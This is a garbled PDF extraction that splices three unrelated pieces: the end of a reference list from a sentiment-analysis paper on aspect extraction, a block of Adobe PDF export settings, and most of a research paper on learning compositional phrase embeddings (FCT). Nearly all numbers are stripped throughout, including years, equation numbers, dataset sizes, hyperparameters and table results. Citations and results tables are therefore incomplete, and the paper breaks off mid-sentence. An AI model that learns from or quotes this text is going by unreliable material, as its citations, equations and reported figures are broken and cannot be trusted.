kang y, zhou l. . rube: rule-based methods for extracting product features from online consumer reviews. information & management ( ): – doi . /j.im. . . . kim k. . an improved semi-supervised dimensionality reduction using feature weighting: application to sentiment analysis. expert systems with applications : – doi . /j.eswa. . . . kiritchenko s, zhu x, cherry c, mohammad s. . nrc-canada- : detecting aspects and sentiment in customer reviews. in: proceedings of the th international workshop on semantic evaluation (semeval ). dublin, – . kumar r, pannu hs, malhi ak. . aspect-based sentiment analysis using deep networks and stochastic optimization. neural computing and applications ( ): – doi . /s - - -z. labani m, moradi p, ahmadizar f, jalili m. . a novel multivariate filter method for feature selection in text classification problems. engineering applications of artificial intelligence : – doi . /j.engappai. . . . liu h, zhou mc, lu xs, yao c. . weighted gini index feature selection method for imbalanced data. in: ieee th international conference on networking, sensing and control. piscataway: ieee, – . ma y, peng h, cambria e. . targeted aspect-based sentiment analysis via embedding commonsense knowledge into an attentive lstm. in: thirty-second aaai conference on artificial intelligence. – . manek as, shenoy pd, mohan mc, venugopal kr. . aspect term extraction for sentiment analysis in large movie reviews using gini index feature selection method and svm classifier. world wide web ( ): – doi . /s - - -x. panchendrarajan r, ahamed n, sivakumar p, murugaiah b, ranathunga s, pemasiri a. . eatery: a multi-aspect restaurant rating system. in: proceedings of the th acm conference on hypertext and social media. new york: acm, – . pontiki m, galanis d, papageorgiou h, androutsopoulos i, manandhar s, al-smadi m, al-ayyoub m, zhao y, qin b, de clercq o, hoste v, apidianaki m, tannier x, loukachevitch n, kotelnikov e, bel n, jiménez-zafra sm, eryiğit g. . semeval- task : aspect based sentiment analysis. in: th international workshop on semantic evaluation. poria s, cambria e, ku lw, gui c, gelbukh a. . a rule-based approach to aspect extraction from product reviews. in: proceedings of the second workshop on natural language processing for social media. – . rachel jl. . uci ml drug review dataset. available at https://www.kaggle.com/jessicali / kuc-hackathon-winter- . rana ta, cheah yn. a. a two-fold rule-based model for aspect extraction. expert systems with applications : – doi . /j.eswa. . . . rana ta, cheah yn. b. improving aspect extraction using aspect frequency and semantic similarity-based approach for aspect-based sentiment analysis. in: international conference on computing and information technology. cham: springer, – . rana ta, cheah yn. . sequential patterns rule-based approach for opinion target extraction from customer reviews. journal of information science ( ): – doi . / . ruskanda fz, widyantoro dh, purwarianti a. . comparative study on language rule based methods for aspect extraction in sentiment analysis. in: international conference on asian language processing. piscataway: ieee, – . bhamare and prabhu ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.im. . . http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /s - - -z http://dx.doi.org/ . /j.engappai. . . http://dx.doi.org/ . /s - - -x https://www.kaggle.com/jessicali /kuc-hackathon-winter- https://www.kaggle.com/jessicali /kuc-hackathon-winter- http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ schouten k, frasincar f. . ontology-driven sentiment analysis of product and service aspects. in: european semantic web conference. cham: springer, – . schouten k, frasincar f, de jong f. . ontology-enhanced aspect-based sentiment analysis. in: international conference on web engineering. cham: springer, – . schouten k, van der weijde o, frasincar f, dekker r. . supervised and unsupervised aspect category detection for sentiment analysis with co-occurrence data. ieee transactions on cybernetic ( ): – doi . /tcyb. . . shafie as, sharef nm, murad maa, azman a. . aspect extraction performance with pos tag pattern of dependency relation in aspect-based sentiment analysis. in: fourth international conference on information retrieval and knowledge management (camp). piscataway: ieee, – . uysal ak. . an improved global feature selection scheme for text classification. expert systems with applications : – doi . /j.eswa. . . . vanaja s, belwal m. . aspect-level sentiment analysis on e-commerce data. in: international conference on inventive research in computing applications. coimbatore: ieee, – . xu q, zhu l, dai t, guo l, cao s. . non-negative matrix factorization for implicit aspect identification. journal of ambient intelligence and humanized computing ( ): – doi . /s - - - . zeng d, dai y, li f, wang j, sangaiah ak. . aspect based sentiment analysis by a linguistically regularized cnn with gated mechanism. journal of intelligent & fuzzy systems ( ): – doi . /jifs- . bhamare and prabhu ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /tcyb. . http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /jifs- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ a supervised scheme for aspect extraction in sentiment analysis using the hybrid feature set of word dependency relations and lemmas ... introduction proposed method results and discussion conclusions references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice learning composition models for phrase embeddings mo yu machine intelligence & translation lab harbin institute of technology harbin, china gflfof@gmail.com mark dredze human language technology center of excellence center for language and speech processing johns hopkins university baltimore, md, mdredze@cs.jhu.edu abstract lexical embeddings can serve as useful rep- resentations for words for a variety of nlp tasks, but learning embeddings for phrases can be challenging. while separate embeddings are learned for each word, this is infeasible for every phrase. we construct phrase em- beddings by learning how to compose word embeddings using features that capture phrase structure and context. we propose efficient unsupervised and task-specific learning objec- tives that scale our model to large datasets. we demonstrate improvements on both language modeling and several phrase semantic simi- larity tasks with various phrase lengths. we make the implementation of our model and the datasets available for general use. introduction word embeddings learned by neural language mod- els (bengio et al., ; collobert and weston, ; mikolov et al., b) have been success- fully applied to a range of tasks, including syn- tax (collobert and weston, ; turian et al., ; collobert, ) and semantics (huang et al., ; socher et al., b; hermann et al., ). however, phrases are critical for capturing lexical meaning for many tasks. for example, collobert and weston ( ) showed that word embeddings yielded state-of-the-art systems on word-oriented tasks (pos, ner) but performance on phrase ori- ented tasks, such as srl, lags behind. we propose a new method for compositional se- mantics that learns to compose word embeddings into phrases. in contrast to a common approach to phrase embeddings that uses pre-defined compo- sition operators (mitchell and lapata, ), e.g., component-wise sum/multiplication, we learn com- position functions that rely on phrase structure and context. other work on learning compositions relies on matrices/tensors as transformations (socher et al., ; socher et al., a; hermann and blun- som, ; baroni and zamparelli, ; socher et al., ; grefenstette et al., ). however, this work suffers from two primary disadvantages. first, these methods have high computational complexity for dense embeddings: o(d ) or o(d ) for compos- ing every two components with d dimensions. the high computational complexity restricts these meth- ods to use very low-dimensional embeddings ( or ). while low-dimensional embeddings perform well for syntax (socher et al., a) and sentiment (socher et al., b) tasks, they do poorly on se- mantic tasks. second, because of the complexity, they use supervised training with small task-specific datasets. an exception is the unsupervised objec- tive of recursive auto-encoders (socher et al., ). yet this work cannot utilize contextual features of phrases and still poses scaling challenges. in this work we propose a novel compositional transformation called the feature-rich composi- tional transformation (fct) model. fct produces phrases from their word components. in contrast to previous work, our approach to phrase composi- tion can efficiently utilize high dimensional embed- dings (e.g. d = ) with an unsupervised objective, both of which are critical to doing well on seman- tics tasks. our composition function is parameter- transactions of the association for computational linguistics, vol. , pp. – , . action editor: joakim nivre. submission batch: / ; revision batch / ; published / . c© association for computational linguistics. distributed under a cc-by-nc-sa . license. ized to allow the inclusion of features based on the phrase structure and contextual information, includ- ing positional indicators of the word components. the phrase composition is a weighted summation of embeddings of component words, where the sum- mation weights are defined by the features, which allows for fast composition. we discuss a range of training settings for fct. for tasks with labeled data, we utilize task-specific training. we begin with embeddings trained on raw text and then learn compositional phrase parameters as well as fine-tune the embeddings for the specific task’s objective. for tasks with unlabeled data (e.g. most semantic tasks) we can train on a large corpus of unlabeled data. for tasks with both labeled and unlabeled data, we consider a joint training scheme. our model’s efficiency ensures we can incorporate large amounts of unlabeled data, which helps miti- gate over-fitting and increases vocabulary coverage. we begin with a presentation of fct (§ ), includ- ing our proposed features for the model. we then present three training settings (§ ) that cover lan- guage modeling (unsupervised), task-specific train- ing (supervised), and joint (semi-supervised) set- tings. the remainder of the paper is devoted to eval- uation of each of these settings. feature-rich compositional transformations from words to phrases we learn transformations for composing phrase em- beddings from the component words based on ex- tracted features from a phrase, where we assume that the phrase boundaries are given. the result- ing phrase embedding is based on a per-dimension weighted average of the component phrases. con- sider the example of base noun phrases (np), a com- mon phrase type which we want to compose. base nps often have flat structures – all words modify the head noun – which means that our transformation should favor the head noun in the composed phrase embedding. for each of the n words wi in phrase p we construct the embedding: ep = n∑ i λi �ewi ( ) where ewi is the embedding for word i; and � refers to point-wise product. λi is a weight vector that is constructed based on the features of p and the model parameters: λij = ∑ k αjkfk(wi,p) + bij ( ) where fk(wi,p) is a feature function that considers word wi in phrase p and bij is a bias term. this model is fast to train since it has only linear transfor- mations: the only operations are vector summation and inner product. therefore, we learn the model parameters α together with the embeddings. we call this the feature-rich compositional transformation (fct) model. consider some example phrases and associated features. the phrase “the museum” should have an embedding nearly identical to “museum” since “the” has minimal impact the phrase’s meaning. this can be captured through part-of-speech (pos) tags, where a tag of dt on “the” will lead to λi ≈ ~ , removing its impact on the phrase embedding. in some cases, words will have specific behaviors. in the phrase “historic museum”, the word “historic” should impact the phrase embedding to be closer to “landmark”. to capture this behavior we add smoothed lexical features, where smoothing reduces data sparsity effects. these features can be based on word clusters, themselves induced from pre-trained word embeddings. our feature templates are shown in table . phrase boundaries, tags and heads are identified us- ing existing parsers or from annotated gigaword (napoles et al., ) as described in section . in eq. ( ), we do not limit phrase structure though the features in table tend to assume a flat structure. however, with additional features the model could handle longer phrases with hierarchical structures, and adding these features does not change our model or training objectives. following the semantic tasks used for evaluation we experimented with base nps (including both bigram nps and longer ones). we leave explorations of features for complex structures to future work. fct has two sets of parameters: one is the fea- ture weights (α,b), the other is word embeddings (ew). we could directly use the word embeddings learned by neural language models. however, our experiments show that those word embeddings are often not suited for fct. therefore we propose to simple features compound features pos tags t(wi− ), t(wi), t(wi+ ) < t(wk), t(wk+ ) > k ∈{i− , i} word clusters c(wi− ), c(wi), c(wi+ ) < c(wk),c(wk+ ) > k ∈{i− , i} wi− , wi, wi+ if wi is function word head word i[i = h] < t(wk),i[i = h] > k ∈{i− , i, i + } < c(wk),i[i = h] > k ∈{i− , i, i + } distance from head dis(h− i) < t(wk),dis(h− i) > k ∈{i− , i, i + } < c(wk),dis(h− i) > k ∈{i− , i, i + } head tag/cluster t(wh),c(wh) if i = h < t(wh), t(wi) >,< c(wh),c(wi) > if i = h table : feature templates for word wi in phrase p. t(w): pos tag; c(w): word cluster (when w is a function word, i.e. a preposition word or conjunction word, there is no need to have smoothed version of the word features based on clusters. therefore we directly use the word forms as features as shown in line of the table); h: position of head word of the phrase p; dis(i−j): distance between wi and wj (distance in tokens). < f ,f > refers to the conjunction (i.e. cartesian product) between two feature templates f and f . learn both the feature weights and the word embed- dings with objectives in section . moreover, ex- periments show that starting with the baseline word embeddings leads to better learning results compar- ing to random initializations. therefore in the rest of the paper, if not specifically mentioned, we always initialize the embeddings of fct with baseline word embeddings learned by mikolov et al. ( b). training objectives the speed and flexibility of fct enables a range of training settings. we consider standard unsu- pervised training (language modeling), task-specific training and joint objectives. . language modeling for unsupervised training on large scale raw texts (language modeling) we train fct so that phrase em- beddings – as composed in section – predict con- textual words, an extension of the skip-gram objec- tive (mikolov et al., b) to phrases. for each phrase pi = (wi , ...,win) ∈ p,wij ∈ v , where p is the set of all phrases and v is the word vocabu- lary. here i is the index of a phrase in set p and ij is the absolute index of the jth component word of pi in the sentence. for predicting the c words to the left and right the skip-gram objective becomes: max α,b,ew,e′w |p| |p|∑ i=   ∑ <j≤c log p ( e′wi −j |epi ) + ∑ <j≤c log p ( e′win+j|epi )   , where p(e′w|epi) = exp ( e′w t epi ) ∑ w′∈v exp ( e′w′ t epi ), ( ) where α,b,ew are parameters (the word embed- dings ew become parameters when fine-tuning is en- abled) of fct model defined in section . as is com- mon practice, when predicting the context words we use a second set of embeddings e′w called output em- beddings (mikolov et al., b). during training fct parameters (α,b) and word embeddings (ew and e′w) are updated via back-propagation. epi is the phrase embedding defined in eq. ( ). wi −j is the j-th word before phrase pi and win+j is the j-th word after pi. we can use negative sampling based noise contrastive estimation (nce) or hierarchical softmax training (hs) in (mikolov et al., b) to deal with the large output space. we refer to this objective as the language modeling (lm) objective. . task-specific training when we have a task for which we want to learn embeddings, we can utilize task-specific training of the model parameters. consider the case where we wish to use phrase embeddings produced by fct in a classification task, where the goal is to determine whether a phrase ps is semantically similar to a can- didate phrase (or word) pi. for a phrase ps and a set of candidate phrases {pi,yi}n , yi = indicates se- mantic similarity of ps and pi and yi = otherwise, we use a classification objective: max α,b,ew ∑ ps n∑ i= yi log p(yi = |ps,pi) = max α,b,ew ∑ ps n∑ i= yi log exp ( eps tepi ) ∑n j exp ( eps tepj ). ( ) where ep is the phrase embedding from eq. ( ). when a candidate phrase pi is a single word, a lex- ical embedding can be used directly to derive epi . when n = for each ps, i.e., we are working on binary classification problems, the objective will re- duce to logistic loss and a bias b will be added. for very large sets, e.g., the whole vocabulary, we use nce to approximate the objective. we call eq. ( ) the task-specific (task-spec) objective. in addition to updating only the fct parameters, we can update the embeddings themselves to im- prove the task-specific objective. we use the fine- tuning strategy (collobert and weston, ; socher et al., a) for learning task-specific word embed- dings, first training fct and the embeddings with the lm objective and then fine-tuning the word em- beddings using labeled data for the target task. we refer to this process as “fine-tuning word emb” in the experiment session. note that fine tuning can be also applied to baseline word embeddings trained with the task-spec objective or the lm objective above. . joint training while labeled data is the most helpful for train- ing fct for a task, relying on labeled data alone will yield limited improvements: labeled data has low coverage of the vocabulary, which can lead to over-fitting when we update fct model parameters eq. ( ) and fine-tune word embeddings. in particu- lar, the effects of fine-tuning word embeddings are usually limited in nlp applications. in contrast to other applications, like vision, where a single input can cover most or all of the model parameters, word embeddings are unique to each word, so a word will have its embedding updated only when the word ap- pears in a training instance. as a result, only words that appear in the labeled data will benefit from fine- tuning and, by changing only part of the embedding space, the performance may be worse overall. language modeling provides a method to update all embeddings based on a large unlabeled corpus. therefore, we combine the language modeling ob- ject (eq. ( )) and the task-specific object (eq. ( )) to yield a joint objective. when a word’s embedding is changed in a task-specific way, it will impact the rest of the embedding space through the lm objective. thus, all words can benefit from the task-specific training. we call this the joint objective and call the re- sulted model fct-joint (fct-j for short), since it up- dates the embeddings with both the lm and task- spec objectives. in addition to jointly training both objectives, we can create a pipeline. first, we train fct with the lm objective. we then fine-tune all the parameters with the task-spec objective. we call this fct-pipeline (fct-p for short). . applications to other phrase composition models while our focus is the training of fct, we note that the above training objectives can be applied to other composition models as well. as an example, consider a recursive neural network (rnn) (socher et al., ; socher et al., a), which recur- sively computes phrase embeddings based on the bi- nary sub-tree associated with the phrase with matrix transformations. for the bigram phrases considered in the evaluation tasks, suppose we are given phrase p = (w ,w ). the model then computes the phrase embedding ep as: ep = σ (w · [ew : ew ]) , ( ) where [ew : ew ] is the concatenation of two em- bedding vectors. w is a matrix of parameters to be learned, which can be further refined according to the labels of the children. back-propagation can be used to update the parameter matrix w and the word embeddings during training. it is possible to train the rnn parameters w with our task-spec or lm objective: given syntactic trees, we can use rnn (instead of fct) to compute phrase embeddings ep, which can be used to compute the objective, and then have w updated via back-propagation. the ex- periments below show results for this method, which we call rnn, with task-spec training. however, while we can train rnns using small amounts of la- beled data, it is impractical to scale it to large cor- pora (i.e. lm training). in contrast, fct easily scales to large corpora. remark (comparison between fct and rnn): besides efficiency, our fct is also expressive. a common approach to composition, a weighted sum of the embeddings (which we include in our experi- ments as weighted sum), is a special case of fct with no non-lexical features, and a special case of rnn if we restrict the w matrix of rnn to be di- agonal. therefore, rnn and fct can be viewed as two different ways of improving the expressive strength of weighted sum. the rnns increase expressiveness by making the transformation a full matrix (more complex but less efficient), which does not introduce any interaction between one word and its contexts. on the other hand, fct can make the transformation for one word depend on its context words by extracting relevant features, while keeping the model linear. as supported by the experimental results, our method for increasing expressiveness is more effec- tive, because the contextual information is critical for phrase compositions. by comparison, the ma- trix transformations in rnns may be unnecessarily complicated and are not significantly more helpful in modeling the target tasks and make the models more likely to over-fit. parameter estimation training of fct can be easily accomplished by stochastic gradient descent (sgd). while sgd is fast, training with the lm or joint objectives re- quires the learning algorithm to scale to large cor- pora, which can be slow even for sgd. asynchronous sgd for fct: we use the dis- tributed asynchronous sgd-based algorithm from mikolov et al. ( b). the shared embeddings are updated by each thread based on training data within the thread independently. with word embeddings, the collision rate is low since it is unlikely that dif- ferent threads will update the same word at the same as will be discussed in the related work session, there do exist some more expressive extensions of rnn, which can ex- ploit the interaction between a word and its contexts. time. however, adding training of fct to this setup introduces a problem; the shared feature weights α in the phrase composition models have a much higher collision rate. to prevent conflicts, we mod- ify asynchronous sgd so that only a single thread updates both α and lexical embeddings simultane- ously, while the remaining threads only update the lexical embeddings. when training with the lm ob- jective, only a single (arbitrarily chosen) thread can update fct feature weights; all other threads treat them as fixed during back-propagation. while this reduces the data available for training fct parame- ters to only that of a single thread, the small number of parameters α means that even a single thread’s data is sufficient for learning them. we take a similar approach for updating the task- specific (task-spec) part of the joint objective dur- ing fct-joint training. we choose a single thread to optimize the task-spec objective while all other threads optimize the lm objective. this means that αs are updated using the task-specific thread. re- stricting updates for both sets of parameters to a sin- gle thread does not slow training since gradient com- putation is very fast for the embeddings and αs. for joint training, we can tradeoff between the two objectives (task-spec and lm) by setting a weight for each objective (e.g. c and c .) how- ever, under the multi-threaded setting we cannot do this explicitly since the number of threads assigned to each part of the objective influences how the terms are weighted. suppose that we assign n threads to task-spec and n to lm. since each thread takes a similar amount of time, the actual weights will be roughly c = c ′ ∗n and c = c ′ ∗n . therefore, we first fix the numbers of threads and then tune c ′ and c ′. in all of our experiments that use distributed training, we use threads. training details: unless otherwise indicated we use -dimensional embeddings, which achieved a good balance between accuracy and efficiency. we use l regularization on the weights α in fct as well as for the matrices w of rnn baselines in sec- tion . in all experiments, the learning rates, num- bers of iterations and the weights of l regularizers are tuned on development data. we experiment with both negative sampling based nce training (mikolov et al., b) for training ppdb xxl total pairs training pairs vocab size nyt phrases words vocab size train , , , train , , , , , dev - dev , - - test - test , - - table : statistics of nyt and ppdb data. “training pairs” are pairs of bigram phrase and word used in experiments. word vec embeddings, the lm objective, and the task-spec objective; as well as use hierarchical softmax training (hs) for language modeling exper- iments. we use a window size c= , the default of word vec. we remove types that occur less than times (default setting of word vec). the vo- cabulary is the same for all evaluations. for nce training we sample words as negative samples for each training instance according to their frequencies in raw texts. following mikolov et al. ( b) if w has frequency u(w) we set the sampling probability of w to p(w) ∝ u(w) / . for hs training we build a hoffman tree based on word frequency. pre-trained word embeddings for methods that require pre-trained lexical embeddings (fct with pre-training, sum (section ), and the fct and rnn models in section ) we always use embeddings trained with the skip-gram model of word vec. the embeddings are trained with nce estimation using the same settings described above. experiments: language modeling we begin with experiments on fct for language modeling tasks (section . ). the resultant em- beddings can then be used for pre-training in task- specific settings (section ). data we use the - subset from the new york times (nyt) portion of gigaword v . (parker et al., ). sentences are tokenized us- ing opennlp. we removed words with frequencies less than , yielding a vocabulary of , word forms and , , tokens for training word em- beddings. this dataset is used for both training baseline word embeddings and evaluating our models trained with the lm objective. when evaluating the lm task we consider bigram nps in isolation (see the we use “input embeddings” learned by word vec. https://opennlp.apache.org/ “phrases” column in table ). for fct features that require syntactic information, we extract the nyt portion of annotated gigaword (napoles et al., ), which uses the stanford parser’s anno- tations. we use all bigram noun phrases (obtained from the annotated data) as the input phrases for eq. ( ). a subset from january of nyt data is withheld for evaluation. baselines we include two baselines. the first is to use each component word to predict the context of the phrase with the skip gram model (mikolov et al., a) and then average the scores to get the probability (denoted as word vec). the sec- ond is to use sum of the skip-gram embeddings to predict the scores. training the fct models with pre-trained word embeddings requires running the skip-gram model on nyt data for iterations: one for word vec training and one for learning fct. therefore, we also run the word vec model for two epochs to provide embeddings for the baselines. . results we evaluate the perplexity of language models that include lexical embeddings and our composed phrase embeddings from fct using the lm objec- tive. we use the perplexity computation method of mikolov et al. ( a) suitable for skip-gram mod- els. the fct models are trained by the hs strategy, which can output the exact probability efficiently and was shown by yu and dredze ( ) to obtain better performance on language modeling. since in section . we use fct models trained by nce, we also include the results of models trained by nce. note that scores obtained from a model trained with hs or nce are not comparable. while the model trained by hs is efficient to evaluate perplexities, nce training requires summation over all words in the vocabulary in the denominator of the softmax to compute perplexity, an impracticality for large vo- cabulary. therefore, we report nce loss with a fixed set of samples for nce trained models. perplexity (hs training) nce loss (nce training) model subset train dev test subset train dev test sum ( epochs) . . . . . . word vec ( epochs) . . . . . . fct (random init, epochs) . . . . . . fct (with pre-training, epochs) . . . . . . table : language model perplexity and nce loss on a subset of train, dev, and test nyt data. ‖λ ‖�‖λ ‖ ‖λ ‖≈‖λ ‖ ‖λ ‖�‖λ ‖ model biological north-eastern dead medicinal new an diversity part body products trial extension fct sensitivity northeastern remains drugs proceeding signed natural sprawling grave uses cross-examination terminated abilities preserve skeleton chemicals defendant temporary species area full sum destruction portion unconscious marijuana new an racial result dying packaging judge renewal genetic integral flesh substances courtroom another cultural chunk signing table : differences in the nearest neighbors from the two phrase embedding models. table shows results for the nyt training data (subset of the full training data containing , phrases with their contexts from july ), de- velopment and test data. language models with fct performed much better than the sum and word vec baselines, under both nce and hs training. note that fct with pre-training makes a single pass over the whole nyt corpus and then a pass over only the bigram nps, and the random initialization model makes a pass over the bigrams twice. this is less data compared to two passes over the full data (baselines), which indicates that fct better captures the context distributions of phrases. qualitative analysis table shows words and their most similar phrases (nearest neighbors) com- puted by fct and sum. we show three types of phrases: one where the two words in a phrase con- tribute equally to the phrase embedding, where the first word dominates the second in the phrase em- bedding, and vice versa. we measure the effect of each word by computing the total magnitude of the λ vector for each word in the phrase. for example, for the phrase “an extension”, the embedding for the second word dominates the resulting phrase embed- ding (‖λ ‖ � ‖λ ‖) as learned by fct. the table highlights the differences between the methods by showing the most relevant phrases not selected as most relevant by the other method. it is clear that words selected using fct are more semantically re- lated than those of the baseline. experiments: task-specific training: phrase similarity data we consider several phrase similarity datasets for evaluating task-specific training. table summarizes these datasets and shows examples of inputs and outputs for each task. ppdb the paraphrase database (ppdb) (gan- itkevitch et al., ) contains tens of millions of automatically extracted paraphrase pairs, including words and phrases. we extract all paraphrases con- taining a bigram noun phrase and a noun word from ppdb. since articles usually have little contribu- tions to the phrase meaning, we removed the easy cases of all pairs in which the phrase is composed of an article and a noun.next, we removed duplicate pairs: if <a,b> occurred in ppdb, we removed re- lations of <b,a>. ppdb is organized into parts, ranging from s (small) to xxxl. division into these sets is based on an automatically derived accuracy metric. we extracted paraphrases from the xxl set. the most accurate (i.e. first) , pairs are used for evaluation and divided into a dev set ( pairs) and test set ( pairs); the remaining pairs were used for training. our ppdb task is an extension of mea- suring ppdb semantic similarity between words (yu http://www.cis.upenn.edu/˜ccb/ppdb/ data set input output ( ) ppdb medicinal products drugs ( )semeval <small spot, flect> true <male kangaroo, point> false ( )turney monosyllabic word monosyllable, hyalinization, fund, gittern, killer ( ) ppdb (ngram) contribution of the european union eu contribution table : examples of phrase similarity tasks. ( ) ppdb is a ranking task, in which an input bigram and a output noun are given, and the goal is to rank the output word over other words in the vocabulary. ( ) semeval is a binary classification task: determine whether an input pair of a bigram and a word form a paraphrase (true) or not (false). ( ) turney is a multi-class classification task: determine the word most similar to the input phrase (in bold) from the five output candidates. for the -choice task, the goal is to select the most similar pair between the combination of one bigram phrase, i.e., the input phrase or the swapped input (“word monosyllabic” for this example), and the five output candidates. the correct answer in this case should still be the pair of original input phrase and the original correct output candidate (in bold). ( ) ppdb (ngram) is similar to ppdb, but in which both inputs and outputs becomes noun phrases with arbitrary lengths. and dredze, ) to that between phrases. data de- tails appear in table . phrase similarity datasets we use a variety of human annotated datasets to evaluate phrase se- mantic similarity: the semeval shared task (korkontzelos et al., ), and the noun-modifier problem (turney ) in turney ( ). both tasks provide evaluation data and training data. se- meval task (a) is a classification task to de- termine if a word phrase pair are semantically simi- lar. turney is a task to select the closest match- ing candidate word for a given phrase from candi- date words. the original task contained seven can- didates, two of which are component words of the input phrase (seven-choice task). followup work has since removed the components words from the can- didates (five-choice task). turney ( ) also pro- pose a -choice task based on this same dataset. in this task, the input bigram noun phrase will have its component words swapped. then all the pairs of swapped phrase and a candidate word will be treated as a negative example. therefore, each input phrase will correspond to test examples where only one of them is the positive one. longer phrases: ppdb (ngram-to-ngram) to show the generality of our approach we evaluate our method on phrases longer than bigrams. we extract arbitrary length noun phrase pairs from ppdb. we only include phrase pairs that differ by more than one word; otherwise the task would reduce to eval- uating unigram similarity. similar to the bigram-to- unigram task, we 